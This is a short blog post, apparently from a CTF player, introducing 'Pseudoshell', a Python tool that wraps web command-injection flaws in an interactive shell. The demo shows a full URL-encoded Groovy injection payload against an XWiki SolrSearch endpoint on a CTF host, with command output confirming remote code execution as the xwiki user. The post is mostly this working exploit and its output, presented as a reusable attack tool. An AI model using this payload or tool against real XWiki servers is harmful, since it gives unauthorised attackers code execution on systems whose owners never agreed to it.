Pseudoshell - sopho-s

Recently I was doing a CTF which involved sending a requests through a vulnerability in xwiki, I tried my hardest to get a reverse shell but none of my attempts seemed fruitful, so I had to manually edit and send requests

This was quite cumbersome, and this isnt the first occurance where this has happend, so I finally decided to make a tool to make a shell from any website vulnerability

sopho-s

pseudoshell

Waiting for api.github.com...

00K

Waiting...

Pseudoshell is a interactive shell that makes the cumbersome task of manaully entering commands in url and form data to get RCE, and automates it

1
❯ python3 pseudoshell.py --wizard
2
Welcome to the pseudo shell wizard, here we will help you set up your shell
3

4
When answering the following questions, please enter ^COMMAND^ at the place you want your command injected
5
The ^COMMAND^ will then be replaced by your command when sending it
6
Right lets begin!
7

8
What is the url: http://wiki.editor.htb/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22^COMMAND^%22%2Eexecute%28%29%2Etext%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
9
What method is the request: GET
10
What is the start extractor: RSS feed for search on [
11
What is the end extractor: ]&lt;/title&gt;
12
Are there more extractors (Y/N): n
13
Welcome to psuedoshell (Press Ctrl+C to exit)
14

15
> ls -la
16
total 72
17
drwxr-xr-x  5 root root  4096 Jul 29 11:48 .
18
drwxr-xr-x 91 root root  4096 Jul 29 11:55 ..
19
drwxr-xr-x  6 root root  4096 Jul 29 11:48 jetty
20
lrwxrwxrwx  1 root root    14 Mar 27  2024 logs -&gt; /var/log/xwiki
21
drwxr-xr-x  2 root root  4096 Jul 29 11:48 start.d
22
-rw-r<del>r</del>  1 root root  5551 Mar 27  2024 start_xwiki.bat
23
-rw-r<del>r</del>  1 root root  6223 Mar 27  2024 start_xwiki_debug.bat
24
-rw-r<del>r</del>  1 root root 10530 Mar 27  2024 start_xwiki_debug.sh
25
-rw-r<del>r</del>  1 root root  9340 Mar 27  2024 start_xwiki.sh
26
-rw-r<del>r</del>  1 root root  2486 Mar 27  2024 stop_xwiki.bat
27
-rw-r<del>r</del>  1 root root  6749 Mar 27  2024 stop_xwiki.sh
28
drwxr-xr-x  3 root root  4096 Jun 13 17:08 webapps
29
> whoami
30
xwiki
31
> id
32
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
33
>

While it looks like a shell, each of these commands are sent indiviually and the result is stripped of noise by the defined extractors. It also supports history

1
> ls -la
2
total 24
3
drwxrwxr-x 3 nick nick 4096 Dec  4 21:35 .
4
drwxrwxr-x 5 nick nick 4096 Dec  4 16:39 ..
5
-rw-rw-r-- 1 nick nick  107 Dec  4 16:12 encoders.py
6
-rw-rw-r-- 1 nick nick 7206 Dec  4 21:35 pseudoshell.py
7
drwxrwxr-x 2 nick nick 4096 Dec  4 16:13 __pycache__
8
-rw-rw-r-- 1 nick nick    0 Dec  4 12:01 smartcommands.py
9
> echo "hello"
10
hello
11
> pwd
12
/home/<hidden>/pseudoshell/src
13
> history dump
14
ls -la
15
echo hello
16
pwd
17
>

You can go back and forth in history using up and down arrows, and you can dump history with history dump (which translates to an echo of all the history) and clear history with history clear

While the shell is fairly minimal at the moment, it should improve, as it saves a lot of time manually entering the commands in the url and having parse the response manually